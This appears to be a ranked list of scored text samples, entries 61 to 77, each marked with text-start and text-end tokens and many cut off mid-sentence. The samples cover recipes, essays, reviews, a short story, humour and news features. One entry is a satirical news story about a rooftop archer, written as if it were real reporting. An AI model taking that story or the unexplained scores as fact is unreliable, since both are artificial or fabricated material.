meal as well). + +There you have it, quick and easy and nice and clean! Serve 4 and can easily be packed away for a desk lunch. + +Happy New Year! + +– Sweet Cinnamon Sin + +Advertisements<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 61; Score = 757760.0 +<|begin_of_text|>Good food, good eating, is all about blood and organs, cruelty and decay. It’s about sodium-loaded pork fat, stinky triple-cream cheeses, the tender thymus glands and distended livers of young animals. It’s about danger—risking the dark, bacterial forces of beef, chicken, cheese, and shellfish. Your first two hundred and seven Wellfleet oysters may transport you to a state of rapture, but your two hundred and eighth may send you to bed with the sweats, chills, and vomits. Gastronomy is the science of pain. Professional cooks belong to a secret society whose ancient rituals derive from the principles of stoicism in the face of humiliation, injury, fatigue, and the threat of illness. The members of a tight, well-greased kitchen staff are a lot like a submarine crew. Confined for most of their waking hours in hot, airless spaces, and ruled by despotic leaders, they often acquire the characteristics of the poor saps who were press-ganged into the royal navies of Napoleonic times—superstition, a contempt for outsiders, and a loyalty to no flag but their own. A good deal has changed since Orwell’s memoir of the months he spent as a dishwasher in “Down and Out in Paris and London.” Gas ranges and exhaust fans have gone a long way toward increasing the life span of the working culinarian. Nowadays, most aspiring cooks come into the business because they want to: they have chosen this life, studied for it. Today’s top chefs are like star athletes. They bounce from kitchen to kitchen—free agents in search of more money, more acclaim. I’ve been a chef in New York for more than ten years, and, for the decade before that, a dishwasher, a prep drone, a line cook, and a sous-chef. I came into the business when cooks still smoked on the line and wore headbands. A few years ago, I wasn’t surprised to hear rumors of a study of the nation’s prison population which reportedly found that the leading civilian occupation among inmates before they were put behind bars was “cook.” As most of us in the restaurant business know, there is a powerful strain of criminality in the industry, ranging from the dope-dealing busboy with beeper and cell phone to the restaurant owner who has two sets of accounting books. In fact, it was the unsavory side of professional cooking that attracted me to it in the first place. In +================================================================================ +Rank = 62; Score = 745472.0 +<|begin_of_text|>Curling up with your favorite ball of fur as she purrs away is pretty close to heaven, at least for cat folk. Yet, hidden between those vibrations, that most appealing of domestic sounds remains wrapped in mystery, and even a little magic. + +No one is certain exactly why cats purr, though there are a number of good guesses. The obvious observation is cats seem to purr when they're pleased and feeling good. But that's not always the case: Some cats also purr when they're hungry, injured, or frightened. And most surprisingly, purring frequencies have been shown to stimulate bone regeneration—yes, bone regeneration. + +Cats purr by using their larynx and diaphragm muscles, both as they inhale and as they exhale, although just how the central nervous system generates and controls those contractions isn't yet understood. Early 19th century taxonomists thought cats could either purr or roar, and split the family Felidae along these lines—"purrers' (subfamily Felinae) and 'roarers' (subfamily Pantherinae). + +A cheetah. Getty Images + +Today, though, taxonomists believe most cats can purr, with a few probable (though not certain) pantherine exceptions: lion, leopard, jaguar, tiger, snow leopard and clouded leopard. (Cheetahs and cougars? Yeah, they purr.) + +So, why do it? If it's a form of communication, it's meant for those near and dear, since cats purr at a frequency and volume too low to travel far. Purring (and many other low-frequency vocalizations in mammals) often are associated with positive social situations: nursing, grooming, relaxing, being friendly. + +More likely, though, purring is simply soothing, or self-soothing, as cats may also purr in stressful situations. In that case, purring would be akin to how humans soothe themselves by crying, laughing, distracting themselves, or even organizing their desk. Some veterinarians and cat enthusiasts have observed cats lying alongside each other and purring when one is injured (a behavior termed "purr therapy"), though scientific literature on the subject is scant. + +Beyond being calming for the injured kitty, "purr therapy" may have bone healing properties. Domestic cats purr at a frequency of about 26 Hertz, in a range that promotes tissue regeneration. That's not as crazy as it sounds: High-impact exercise promotes bone health for +================================================================================ +Rank = 63; Score = 741376.0 +<|begin_of_text|>Study finds that simple 2-question survey can better identify hungry children + +Asking parents just two simple screening questions could help health care providers and social workers to easily and quickly identify families whose young children are suffering from hunger, enabling early interventions that could prevent serious health consequences, according to a new study led by University of Maryland School of Medicine researchers. The study, published July 1 in the journal Pediatrics, analyzed data gathered from more than 30,000 families nationwide, about a quarter of whom suffered from hunger. The researchers examined whether the time-consuming, 18-question Household Food Security Survey provided by the federal government could be shortened and still be effective in identifying hungry families. They found that just the first two statements, with which families were asked to agree or disagree, were key: "Within the past 12 months we worried whether our food would run out before we got money to buy more;" and "Within the past 12 months the food we bought just didn't last and we didn't have money to get more." + +The researchers found that 92.5 percent of the hungry families answered "yes" to the first question, and 81.9 percent of the families answered yes to the second, meaning that positive answers to those questions alone could accurately identify most families affected by hunger. + +Such an efficient screening test can save time and get help to more hungry families faster, according to lead author Erin Hager, Ph.D., assistant professor of pediatrics at the University of Maryland School of Medicine. "This paper is the evidence that it works," Dr. Hager says. "Now, this can immediately be used by any social service agency or any clinic to more quickly get hungry children connected with the assistance they need to stay nourished, healthy and developmentally on track." + +Hunger can be invisible in American children because they do not physically appear skinny or emaciated, according to senior author Maureen Black, Ph.D., the John A. Scholl, M.D., and Mary Louise Scholl, M.D., Professor of Pediatrics at the University of Maryland School of Medicine. "Unlike hungry children in Third World countries who may go without food, American parents have access to cheap, nutrient-deprived foods they can use to fill their children's bellies and maintain their weight. However, without critical nutrients such as iron, babies and toddlers can suffer from serious health consequences." + +Health care professionals rarely ask parents if they have enough nutritious food to feed their families. "People who are hungry and who can't feed their kids are often +================================================================================ +Rank = 64; Score = 733184.0 +<|begin_of_text|>Jamaican recipes that will make you say... YAH MON! + +Can you say? "Hold the spice," Of course you can! These Jamaican Recipes will make you the talk of the town, neighborhood, school, social club, church, campsite...you know. + +You will impress your friends with these exotic recipes. + +Have you ever tried any of these recipes: Brown Stewed Fish, Escovitch Fish, Curry Chicken, Goat Meat, Rice & Peas, Seasoned Rice, Cabbage and Salt Fish, Cornmeal Porridge, Banana Porridge, Sorrell, Ginger Beer, Calaloo and Dumplings, Bulla? + +Or Plantain Tarts, Gizzarda, Top and Bottom, Asham, Beef Pattie and Coco Bread, Bun & Cheese, Toto, Jerk Chicken, Yam & Banana with Saltfish, Bully Beef & Bread, and Dutty Gal? + +Or Shad & Banana, Red Herring & Crackers, Mackerel & Banana...to rahtid, cuyah...eh...eh. a yahso it deh... YAH MON Oh! Sorry (I shall now switch to Her Majesty's English) I got carried away. + +Yes, it's easy to get carried away when talking/writing about these foods. I get the mouth-watering effect that makes me hungry. + +Some of the names of the foods mentioned in the above sentences may not sound familiar to you, but don’t worry…you’ll become an expert cook making these dishes in no time. + +Another thing not to worry about is how you pronounce the names of the food…if you don’t get it, big deal. Taste is what we are concerned about, not names. + +And if you meet a Mr. or Mrs. Brag & Boast know-it-all Jamaican cook, be nice to him/her, and try to get some of his/her cooking methods, believe me the knowledge wont hurt you. + +HOLD THE SPICE + +Over time, in our little restaurant in Atlanta, Georgia we have heard several people say they like the Jamaican food but it’s “too spicy.” That’s before they try anything on our menu…go figure. + +And to their surprise, after tasting a sample of our food, such as Stew Chicken or Oxtail, their expression was,"this is soooo good, can I have the recipe?" "mmm...Sure!" + +See, no need to hold the spice. Why? It isn’t hot and spicy at all. + +You can +================================================================================ +Rank = 65; Score = 733184.0 +<|begin_of_text|>Saturday Night Live Transcripts + +Season 1: Episode 1 + +75a: George Carlin / Billy Preston, Janis Ian + +George Carlin’s Monologue + +…..George Carlin + +George Carlin: Thank you! Talk about a live show! It’s nice to see you, welcome, and thanks for joining us – live. Um.. I’m kinda glad that we’re on at night, so that we’re not competing with all the football and baseball. So many, man.. And this is the time of year when there’s both, you know? + +Football’s kinda nice, they changed it a little bit – they moved the hash marks in. Guys found it and smoked them, anyway! But you know, football wants to be the number-one sport, the national pasttime. And I think it already is, really, because football represents something we are – we are Europe, Jr. When you get right down to it, we’re Europe, Jr. We play a Eurpe game. What was the Europe game? [ high voice ] “Let’s take their land away from them! You’ll be the pink, on up; we’ll be blue, the red and the green!” + +Ground acquisition. And that’s what football is, football’s a ground acquisition game. You knock the crap out of eleven guys and take their land away from them. Of course, we only do it ten yards at a time. That’s the way we did it with the Indians – we won it little by little. First down in Ohio – Midwest to go! + +Let’s put it this way – there are things about the words surrounding football and baseball, which give it all away: + +Football is technological; baseball is pastoral. + +Football is played in a stadium; baseball is played in the park. + +In football, you wear a helmet; in baseball, you wear a cap. + +Football is played on an enclosed, rectangular grid, and everyone of them is the same size; baseball is played on an ever-widening angle that reaches to inifinity, and every park is different! + +Football is rigidly timed; baseball has no time limit, we don’t know when it’s gonna end! We might even have extra innings! + +In football, you get a penalty; in baseball, you make an error – whoops! + +The object in football is to march downfield and penetrate enemy territory, and get into the end zone; in baseball, the object is to go home! “I’m going home!” + +And, in football +================================================================================ +Rank = 66; Score = 733184.0 +<|begin_of_text|>He was still holding the perfectly-wrapped present. The glossy smiling row of Santas beaming happily from the red and green paper at him. He studied their identical faces, looking for any sort of imperfection that could distinguish them from each other. A pointless task but he wasn’t prepared to look up at Marge yet. He wondered if she would have actually liked the small golden ring he had bought her, the one with little green Colombian emerald that cost him a small fortune. ‘It’s perfect,’ he remembered thinking when he chanced upon it a couple of months earlier whilst browsing idly in a second-hand shop. And now he was holding it in his hands, wrapped in the special Christmas paper that they had bought together a few days before to wrap the gifts of those friends they didn’t really liked who lived down the road. A joke he thought she’d appreciate. How irrelevant it seemed now. + +‘Are you not going to say anything? He heard Marge saying and he suddenly became aware of the Christmas lights wrapped around the tree next to him. ‘Will you marry me?’ he remembered practising in front of the mirror that morning. He didn’t want to ruin a moment they’ve both been waiting for for over 5 years. He smiled as he remembered his ruddy reflection in the mirror. ‘I’ve called Michael already,’ Marge went on, ‘he’s picking me up in 5 minutes.’ + +She stood up quickly, dropping the Christmas crackers she’d had on her lap. ‘I’m really sorry about this, Peter,’ she hesitated, ‘I just can’t do it anymore.’ He heard her steps as she walked away. He picked up one of the crackers and in search of another pointless task, he pulled it. The paper-thin hat, a miniature bowling set and the joke all fell to the ground. He picked up the hat and the joke. He looked toward the door where Marge was crying and pulling her coat on. Looking down, he read the joke. ‘What question can you never answer yes to? Are you asleep?’ The front door slammed closed. He could feel a tear forming in the corner of his eye and he dropped the joke and the wrapped present on the floor. He didn’t want to look up so he put his cracker hat on and softly muttered goodbye. + +Advertisements<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 67; Score = 729088.0 +<|begin_of_text|>In one of the stranger news stories to surface in recent weeks, a 23 year old male was arrested in the central region of Los Angeles yesterday, charged with trespassing and attempted battery on Hollywood boulevard. The man, now known as Thomas Hamond, was found on the rooftops of several stores, wielding a bow and arrow. With emergency services having been called and concerned for his welfare the nearby area was evacuated. + +Hamond was found to be wielding a bow and arrow at the scene, repeatedly shouting “Ryuu ga waga teki wo kurau!”. When officers tried to talk to the trespasser, he would only respond with “I am ready to unleash the dragon!” before firing arrows into the air. + +The location where the incident occured + +Fortunately for the those involved it transpired that the bow and arrow Hamond was using was a children's toy. “I’ve never seen anything like it. Not only was he naked with aluminum foil wrapped around his legs, but he’s firing toy arrows at us. I can’t pull some of them off my vehicle they’ve stuck so tight.” + +Officer Schwimpy, who was first responder, went on to detail how he and his fellow officers were unable to open a dialogue with Hamond. “He just kept shouting Ryuu ga waga...something. I haven’t a clue what it means. He wouldn’t listen and kept talking about a dragon and moving a payload." + +Local residents who were seen to be cheering on Hamond as he fired from the rooftops, were keen to support him. “I was sat drinking my mocha-choca-latte and looked up, and there’s this guy firing arrows down at the cops. Everyone dived for cover until they saw the rubber ends.” said one passerby. + +Police released this image of the offending bow and arrow. + +Hamond was eventually apprehended after local police cornered him on one of the rooftops. While being detained it is reported that he continually shouted “The dragon stirs within me!” and requested that officers be careful of his legs. Although there’s no additional information as to what prompted Hamond to behave as he did, relatives had become concerned about the amount of time he had been spending on his computer. + +“He never shuts up about a girl called Mei. We think he’s got himself a girlfriend. We’re pleased but he never brings her home and now all this mess.” stated Hamond’s Mom, Linda. + +Although there’s no further statement from the Los Angeles Police Department, our +================================================================================ +Rank = 68; Score = 724992.0 +<|begin_of_text|>In Julian Barnes’s novel Staring at the Sun, teenage Jean Serjeant is struck by the firmness of her parents’ moral views. Their opinions seem to her like ‘honking frogs’ compared with her own ‘twitching, vulnerable tadpoles’. How can people be so sure of what they think, Jean wonders: ‘How could you know your own mind without using your mind to discover your mind in the first place?’ It seems almost circular, putting Jean in mind of ‘a dog circling in pursuit of its own cropped tail’.[1] + +Jean’s questions provoke further questions. How do we discover what we think? If we must use our minds to discover our minds, then can we make mistakes about them? Can you be wrong about what you think, just as you can be wrong about what somebody else thinks? I express liberal views on most political and social issues, but can I be sure I really believe the things I say? Perhaps I just say them to fit in and get my friends’ approval? + +The suggestion that we might make mistakes about our own minds runs against common sense. We assume that our minds are, as it were, transparent to us -- that we can tell what’s in them directly and infallibly. Yet there are reasons to doubt that common sense is right about this. It is possible to have a thought without knowing that you have it. Infants and non-human animals have beliefs (for example, that Daddy is close by or that there is food on the table), without knowing that they have them. They have beliefs but do not have beliefs about their beliefs. Some further process is required (some ‘use of the mind’) to gain that self-knowledge, and the process might not always be reliable. Moreover, there is experimental evidence that we do in fact make mistakes about our own minds. It is well established that people’s choices can be influenced by factors of which they are not consciously aware. For example, if offered a choice of identical items, people tend to opt for the one furthest to the right. But if asked why they chose this item, they do not mention its position but offer some plausible reason, such as that they thought it was the best quality. Similar effects have been observed in other experimental situations. It seems that when people do not know why they performed an action, they unconsciously confabulate an explanation for it, attributing to themselves mental states they do not really have.[2] + +So how then do we get to know about our own +================================================================================ +Rank = 69; Score = 720896.0 +<|begin_of_text|>Example One: Alex has a PhD in Subjectology. Jamie knows that Alex has a PhD in Subjectology, yet, during a discussion of Subject, Jamie, who has an interest in and is reasonably knowledgeable about Subject, condescendingly explains basics of Subject to Alex without regard for Alex's demonstrable proficiency. Alex expresses that Jamie's insistence on explaining basics makes Alex feel as though Jamie does not respect Alex's competency or intellectual capacity. Jamie, whose intent was actually to impress Alex, insists that hir intent was not to make Alex feel that way. Alex makes a valiant attempt to explain why Jamie behaving as though Alex doesn't know the basics of Alex's professional field is disrespectful, at which point Jamie gets miffed, reiterates that the intent was not to make Alex feel bad, accuses Alex of looking for things to get mad about, and misrepresents Alex's good faith attempt to address demeaning language as a personal attack on Jamie. + +Thus, what had started out as an inadvertent slight becomes a harmful exchange, as Jamie refuses to acknowledge that the effect of the action irrespective of its intent was hurtful to Alex, and deflects accountability by casting Alex as unreasonable. + +Example Two: Kelly and Terry are friends. Kelly is fat; Terry is thin. Terry routinely expresses disgust with hir body by saying things like, "I am so fat" and "This cellulite is disgusting." Kelly tells Terry that such expressions are hurtful and make hir wonder what Terry must think of hir, since zie is much fatter than Terry. Terry, whose intent was actually to solicit support and validation from Kelly, insists that hir intent was not to make Kelly feel that way. Kelly makes a valiant attempt to point out that even if it was not intended to make hir feel bad about hir body, it does, because Terry is associating fatness with something bad. Terry reacts defensively, reiterating that the intent was not to make Kelly feel bad and accusing Kelly of being jealous and oversensitive. + +Thus, what had started out as a misguided attempt to connect becomes a harmful exchange, as Terry refuses to acknowledge that, despite a lack of intention to be hurtful, zie was hurtful nonetheless, and deflects accountability by projecting hir void of sensitivity onto Kelly as an abundance of oversensitivity. + +Example Three: Jesse has a habit of casually using the rhetoric of sexual violence ("I got raped by that ATM fee"), even around hir friend Jordan, who was raped. Jordan has asked Jesse not +================================================================================ +Rank = 70; Score = 720896.0 +<|begin_of_text|>I feel like my arm is all warmed up and I don’t have a game to pitch. I was primed to review "Atlas Shrugged." I figured it might provide a parable of Ayn Rand’s philosophy that I could discuss. For me, that philosophy reduces itself to: "I’m on board; pull up the lifeline." There are however people who take Ayn Rand even more seriously than comic-book fans take "Watchmen." I expect to receive learned and sarcastic lectures on the pathetic failings of my review. + +And now I am faced with this movie, the most anticlimactic non-event since Geraldo Rivera broke into Al Capone’s vault. I suspect only someone very familiar with Rand’s 1957 novel could understand the film at all, and I doubt they will be happy with it. For the rest of us, it involves a series of business meetings in luxurious retro leather-and-brass board rooms and offices, and restaurants and bedrooms that look borrowed from a hotel no doubt known as the Robber Baron Arms. + +Advertisement + +During these meetings, everybody drinks. More wine is poured and sipped in this film than at a convention of oenophiliacs. There are conversations in English after which I sometimes found myself asking, "What did they just say?" The dialogue seems to have been ripped throbbing with passion from the pages of Investors’ Business Daily. Much of the excitement centers on the tensile strength of steel. + +The story involves Dagny Taggart (Taylor Schilling), a young woman who controls a railroad company named Taggart Transcontinental (its motto: "Ocean to Ocean"). She is a fearless and visionary entrepreneur, who is determined to use a revolutionary new steel to repair her train tracks. Vast forces seem to conspire against her. + +It’s a few years in the future. America has become a state in which mediocrity is the goal, and high-achieving individuals the enemy. Laws have been passed prohibiting companies from owning other companies. Dagny’s new steel, which is produced by her sometime lover, Hank Rearden (Grant Bowler), has been legislated against because it’s better than other steels. The Union of Railroad Engineers has decided it will not operate Dagny’s trains. Just to show you how bad things have become, a government minister announces "a tax will be applied to the state of Colorado, in order to equalize our national economy." So you see how governments and unions are the enemy of visionary entrepreneurs. + +But +================================================================================ +Rank = 71; Score = 716800.0 +<|begin_of_text|>Picture a suburban housewife of the 1950s. Her name is Mrs. John Drone (Mary), and she lives in Rolling Knolls Estates, a new development of what the salesman calls "California Cape Cod Ramblers" on the outskirts of Washington, D.C. Whatever knolls might have rolled gently over the land at one time have been flattened for muddy streets of two-bedroom houses, named after famous conflicts of World War II. + +One rainy morning on Bataan Boulevard, Mary hangs her washing on a clothesline in the living room and knocks her shin on her son’s tricycle. Pain shoots up her leg and she bursts into tears. Then the front door blows open, and she starts shouting: + +‘Watch out, can’t you see the wash is up? You’re getting the wash all dirty.’ Mary very nearly screamed. ‘I’m sorry dear,’ a familiar, monotonous voice said. ‘Oh, it’s you,’ Mary said. And it was. John Drone, master of all he surveyed, had returned to his castle and to the bosom of his admiring family. He closed the door. + +Mary and John are the unfortunate (fictional) protagonists of The Crack in the Picture Window, published in 1957 by John Keats, a journalist at the now defunct Washington Daily News. A lacerating (and very funny) indictment of postwar suburbs as "fresh-air slums," Keats’s polemic sold millions of copies in paperback. It revolves around the tragicomic story of the Drones, a nice young couple gulled, first, into buying a box at Rolling Knolls Estates, and then into thinking a larger, more expensive box in a different suburb could cure what ailed them. + +When, near the start of the book, Mary hurts her leg and yells at her husband, Keats blames her agitation on her inadequate living space. If the house had had a basement, he notes, she could have hung the washing there rather than in the living room. If it had had more storage space, the tricycle wouldn’t have stood in her way. If it had had a separate dining room, rather than a rudimentary "dining alcove" off the kitchen, she wouldn’t have struggled to converse with a friend over the shouts of their children, which had frayed her nerves earlier the same day. + +The problem was not Mary. It was her house: + +[S]omewhere deep inside her she knew perfectly well that the house she inhabited had helped spoil her +================================================================================ +Rank = 72; Score = 716800.0 +<|begin_of_text|>Music Humor - Rules Of The Blues + +back to Music Humor Page + +Author unkown. (Wish we knew, 'cause it's really funny) + +1. Most Blues begin, "Woke up this morning..." + +2. "I got a good woman" is a bad way to begin the Blues, unless you stick something nasty in the next line like, "I got a good woman, with the meanest face in town." + +3. The Blues is simple. After you get the first line right, repeat it. Then find something that rhymes... sort of: "Got a good woman with the meanest face in town. Yes, I got a good woman with the meanest face in town. Got teeth like Margaret Thatcher, and she weigh 500 pound." + +4. The Blues is not about choice. You stuck in a ditch, you stuck in a ditch--ain't no way out. + +5. Blues cars: Chevys, Fords, Cadillacs and broken-down trucks. Blues don't travel in Volvos, BMWs, or Sport Utility Vehicles. Most Blues transportation is a Greyhound bus or a southbound train. Jet aircraft and company motor pools ain't even in the running. Walkin' plays a major part in the blues lifestyle. So does fixin' to die. + +6. Teenagers can't sing the Blues. They ain't fixin' to die yet. Adults sing the Blues. In Blues, "adulthood" means being old enough to get the electric chair if you shoot a man in Memphis. + +7. Blues can take place in New York City but not in Hawaii or any place in Canada. Hard times in Minneapolis or Seattle is probably just clinical depression. Chicago, St. Louis, and Kansas City are still the best places to have the Blues. You cannot have the blues in any place that don't get rain. + +8. A man with male pattern baldness ain't the blues. A woman with male pattern baldness is. Breaking your leg cause you were skiing is not the blues. Breaking your leg 'cause a alligator be chompin' on it is. + +9. You can't have no Blues in a office or a shopping mall. The lighting is wrong. Go outside to the parking lot or sit by the dumpster. + +10. Good places for the Blues: + +a. Highway + +b. Jailhouse + +c. An empty bed + +d. Bottom of a whiskey glass + +11. Bad places for the Blues: + +a. Nord +================================================================================ +Rank = 73; Score = 716800.0 +<|begin_of_text|>Do you have a friend who is in the process of turning into Bridezilla (or even Groomzilla, since women certainly don't have a monopoly on wedding madness)? Then I have the perfect gift for her – though on second thoughts, perhaps this is a treat best left until after her nuptials when, one hopes, your friend will miraculously recover her mislaid sense of humour. Adrian Tomine, author of the brilliant Shortcomings and a cartoonist at the New Yorker, has written a "prenuptial memoir" called Scenes from an Impending Marriage in which he lays bare, with ruthless efficiency, the bizarre effect that organising a wedding can have on even the sane and the cynical (and Tomine, as fans will know, is nothing if not cynical). Is it accurate? Yes, as a laser. Is it hilarious? All I can say is that it will make you – if not your good pal Bridezilla – snort like a dragon. Don't, on any account, combine reading it with lunch. + +Tomine's specialist subject is angst and alienation among young bohemians; his characters wear heavy spectacles and cool sneakers, they eat a lot of takeout, and they worry excessively about fitting in. It's a world he knows well: Tomine has never flinched from the idea that much of what he writes and draws is thinly disguised autobiography. But because he's so devastatingly observant, he cannot be anything other than hardest on himself. Scenes from an Impending Marriage is more of the same, really, only this time it's explicit: the book began its life when his fiancee, Sarah, begged him to draw a miniature comic book for their guests as a wedding "favour". I wonder what those guests think now. One of the book's funniest sections is about who one invites to a wedding, and why. His list, compared with hers, is tiny. "Come on!" he yells, in a funk before they've even begun. "We've gotta break this endless cycle of obligation and reciprocity!" + +It's all here: from choosing a venue, to picking a DJ, to registering for a wedding list ("It's emblematic of our whole culture: 'I want lots of stuff and I want to shoot a gun!'" observes Adrian in Crate & Barrel, where couples must use a barcode scanner to compile their list). There is even a section entitled: "An Even-Handed Acknowledgment of Both Families' Cultural Heritage", +================================================================================ +Rank = 74; Score = 712704.0 +<|begin_of_text|>In January 1848, a work crew at John Sutter’s mill, near Sacramento, California, came across a few select nuggets of gold. Before long, a half-million prospectors arrived there seeking instant riches. The gold rush was on. Some 153 years later, another gold rush broke out at an old mine called Red Lake, in northwestern Ontario. This time, the fortune hunters wielded geological-modeling software and database mining tools rather than picks and shovels. The big winners were from Australia. And they had never even seen the mine. + +Rob McEwen, chairman and CEO of Goldcorp Inc., based in Toronto, had triggered the gold rush by issuing an extraordinary challenge to the world’s geologists: We’ll show you all of our data on the Red Lake mine online if you tell us where we’re likely to find the next 6 million ounces of gold. The prize: a total of $575,000, with a top award of $105,000. + +The mining community was flabbergasted. “We’ve seen very large data sets from government surveys online,” says Nick Archibald, managing director of Fractal Graphics, the winning organization from West Perth, Australia. “But for a company to post that information and say, ‘Here I am, warts and all,’ is quite unusual indeed.” + +McEwen knew that the contest, which he called the Goldcorp Challenge, entailed big risks. For one thing, it exposed the company to a hostile-takeover bid. But the risks of continuing to do things the old way were even greater. “Mining is one of humanity’s oldest industrial pursuits,” McEwen says. “This is old old economy. But a mineral discovery is like a technological discovery. There’s the same rapid creation of wealth as rising expectations improve profitability. If we could find gold faster, we could really improve the value of the company.” + +McEwen, a small, soft-spoken man with a neatly trimmed mustache and meticulous tailoring, had one big advantage over his slow-footed competitors: He wasn’t a miner, he didn’t think like a miner, and he wasn’t constrained by a miner’s conventional wisdom. As a young man, he went to work for Merrill Lynch, following his father into the investment business. But his father also had a fascination with gold, and McEwen grew up hearing tales of miners, prospectors, and grubstakes at the dinner table. Soon he was bitten by the gold bug too +================================================================================ +Rank = 75; Score = 700416.0 +<|begin_of_text|>Medical Marijuana Measure Possible On November Ballot + +The November election may be months away, but Ohioans are already preparing to cast their votes on many issues — including whether to legalize a form of medical treatment that's used in more than a dozen states and Washington D.C. + +"I couldn't sleep. I couldn't stand. I couldn't sit. There's no position you can place yourself in where you're comfortable," said Cynthia Wynia, who has used marijuana for pain management. + +Wynia says her pain as a result of spine problems was unbearable. + +After undergoing three rounds of physical therapy, several Cortizone injections, and surgery, nothing seemed to be working. + +Then, she was given a different kind of treatment. + +"A friend of mine offered me some marijuana," said Wynia. The results, she says, were unlike anything she had ever tried. + +"It took me a while to realize it. I was getting up and down. I was going up stairs. I was moving around — dancing. It didn't hurt. I said 'I do not hurt'," said Wynia. + +She only used the drug once, but was pain-free for the first time in years and feels marijuana should be legalized for medical reasons. Not everyone agrees. + +"It's an ever-changing drug, and it's not really a benign drug. It's a drug that we need to look at very carefully that causes a lot of harm to our society," said Marcie Seidel, executive director of Drug-Free Action Alliance. + +Seidel says the uncertainty of marijuana's side effects make it difficult to be used as legitimate medicine. + +"I don't know of any other drug in our repertoire of medications where you take it and you know only what it might do, but you have no idea what the side effects are," said Seidel. + +She's says alarmed by marijuana's integration into mainstream society. "In a prevention world, we know that whenever you take away the perception that something is harmful, use will go up." + +For Wynia, the benefits of using marijuana for those suffering from extreme pain far outweigh any negatives. + +"It has its uses, it has its misuses, just like any other substance. If this can relieve pain from people who cannot find relief in any other way, there is no reason not to legalize it for medical use," said Wynia. + +Signatures are still being gathered to put medical marijuana on the Ohio ballot. + +The deadline is July 4. + +Sixteen states currently classify marijuana as legal for medical treatment.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 76; Score = 700416.0 +<|begin_of_text|>In 1984, the San Francisco Giants were an awful team. They played in Candlestick Park, so renowned for it's frosty nights that every fan that stayed to the end of extra inning night games got a pin commending them, the croix de candlestick (which said in Latin "I came, I saw, I survived.) IT was so bad that a poll of the fans in 1984 found that almost 80 percent of them would boo a mascot if the Giants got one. This lead to one of the most anarchic and anti-marketing ideas in the increasingly anti-septic sports marketing world, the Crazy Crab. Tonight, the Giants are giving out Crazy Crab bobble-heads at their game. I want one. Bad. + +First off, a disclaimer, in 1984 a young Ezra was hired to be a voice in a 30 second radio spot for the Crab. I believe my only line was "I hate that stupid crab." I did not. Not really. + +See, hating the crab was the whole idea. The Giants took the fans orneriness and used it as a marketing tool. The Crab announced it was a Dodgers fan (a virtual death sentence at the Stick in the 80s) and even did some radio and TV interviews in LA (calling the Giants a "classless organization.) The crab also taunted players, "trashed" their lockers, and (in a stirring return) got on the PA system at the next to last game at the Stick and announced that he hoped the Dodgers won the series. Heck, he even cheered for the umps! The Giants marketing department actively pushed for fans to hate the anti-mascot and it worked better than they could have imagined. + +The actor in the crab suit was in no small jeopardy when he showed up during games. Fans threw batteries, beers and anything else they could find at him when he went into the stands. The Giant's manager, Frank Robinson, had to be restrained from going after the Crab in one game (he was clearly not in on the joke) and players routinely tried to hit him in batting practice. As Giants pitcher and broadcaster Mike Krukow says "It was a more sophisticated baseball fan, but a less sophisticated person that came to games back then." One story has the handler who went around with the crab in the stands having to assure the actor that no one in the audience had a gun. + +The success of the Crab (despite the danger to the person) was in drawing attention +================================================================================ +Rank = 77; Score = 696320.0 +<|begin_of_text|>Media playback is unsupported on your device Media caption Refugee doctor: 'I hope to make the UK proud' + +Doctors who have travelled to Scotland as refugees are being given the chance to start working for the NHS through a training scheme. The BBC's Victoria Derbyshire programme has been to meet those involved. + +"When people say, 'I had a couple of beers', they don't mean two," jokes instructor Dr Patrick Grant, a retired A&E doctor training refugees to work for NHS Scotland - including in how to overcome cultural barriers. + +One of his students is Fatema, who previously worked as a surgeon in the Middle East until she was forced to flee. + +Having treated anti-government protesters in her home country, she herself had become a government target. + +"I wish one day this country will be proud of me," she says. + +Fatema is one of 38 refugees and asylum seekers on the course - a £160,000 programme funded by the Scottish government. + +Based in Glasgow, it provides the doctors with advanced English lessons, medical classes and placements with GPs or hospitals. + +The aim is to give the refugee doctors - who commit to working for NHS Scotland - the skills to get their UK medical registration approved. + +'Like being handcuffed' + +Fatema says coming to the UK and not being able to work as a surgeon had felt like being "handcuffed". + +"I'm a qualified medical doctor. It's hard to start again from zero," she explains. + +Maggie Lennon, founder of the Bridges Programmes which runs the scheme, says it is important for the UK to utilise its high-skilled refugees. + +Image caption Maggie Lennon says the refugee doctors' clinical skills are very similar to those of doctors trained in the UK + +"I always say to people, 'I imagine taking out an appendix in Peshawar is not that different to taking out an appendix in Paisley'. + +"I don't think there's actually any difference in the clinical skills, I think where there is a huge difference is attitudes to patients and how medicine is performed," she explains. + +The scheme is designed to overcome such hurdles, including the 